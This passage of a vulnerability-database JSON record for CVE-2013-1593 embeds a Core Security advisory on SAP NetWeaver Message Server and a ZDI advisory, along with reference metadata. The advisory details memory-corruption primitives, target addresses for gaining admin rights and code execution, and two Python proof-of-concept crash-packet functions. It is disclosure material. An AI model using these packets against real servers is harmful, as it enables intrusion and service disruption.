can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ;\n_MsJ2EE_AddStatistics+4Co ... \n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n 1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n 2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. \n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0 offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ;\u003c-- we can overwrite this one\n.data:0087DED0 offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3: ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3 lea esi, [edi+edi*2]\n.text:00404DB6 mov edi, [ebp+pvalue]\n.text:00404DB9 add esi, esi\n.text:00404DBB mov edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2 add esi, esi\n.text:00404DC4 push edi\n.text:00404DC5 push pname\n.text:00404DC6 call edx ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n 1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n 2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n crash+= \"\\x00\\x00\\x00\\x01\"\n crash+= \"\\xff\\xff\\xff\\xff\"\n crash+= \"\\x00\\x00\\x00\\x00\"\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+= \"AD-EYECATCH\\x00\"\n crash+= \"\\x01\\x01\"\n crash+= \"%11d\" % 104\n crash+= \"%11d\" % 1\n crash+= \"\\x15\\x00\\x00\\x00\"\n crash+= \"\\x20\\x00\\x00\\xc8\"\n crash+= \"LALA\" + \u0027 \u0027*(20-4)\n crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n crash+= \" \"*36\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fails in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosing on Feb 12th. Core also asks additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletin, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVE were assigned to them. Those\nvulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks additional information regarding the affected and\npatched version numbers. 2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarting this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps//service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1593"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
}
],
"trust": 5.49
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1593",
"trust": 2.9
},
{
"db": "BID",
"id": "57956",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1028148",
"trust": 1.7
},
{
"db": "ZDI",
"id": "ZDI-12-104",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2012-3434",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-3433",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-112",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-111",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1396",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1394",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1395",
"trust": 0.7
},
{
"db": "BID",
"id": "54229",
"trust": 0.6
},
{
"db": "BID",
"id": "54231",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368",
"trust": 0.6
},
{
"db": "IVD",
"id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "120350",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2013-1593",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114279",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"id": "VAR-202001-0833",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
]
},
"last_update_date": "2024-07-23T22:37:43.471000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"title": "top page",
"trust": 0.8,
"url": "https://www.sap.com/japan/index.html"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18435"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18434"
},
{
"title": "SAP NetWeaver \u2018msg_server.exe\u2019 Remediation measures for remote denial of service vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108971"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-129",
"trust": 1.0
},
{
"problemtype": "Improper validation of array index (CWE-129) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/57956"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/cve/cve-2013-1593"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1028148"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
},
{
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/186"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/185"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/129.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/120350/sap-netweaver-message-server-buffer-overflow.html"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1800603."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
},
{
"trust": 0.1,
"url": "http://www.sap.com/platform/netweaver/index.epx."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"date": "2013-02-13T00:00:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"date": "2013-02-15T23:44:44",
"db": "PACKETSTORM",
"id": "120350"
},
{
"date": "2012-06-28T03:51:55",
"db": "PACKETSTORM",
"id": "114279"
},
{
"date": "2013-02-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"date": "2020-01-23T20:15:11.730000",
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-31T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"date": "2013-06-12T18:46:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"date": "2020-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"date": "2020-01-31T16:42:13.070000",
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
}
],
"trust": 0.6
}
}
VAR-201208-0222
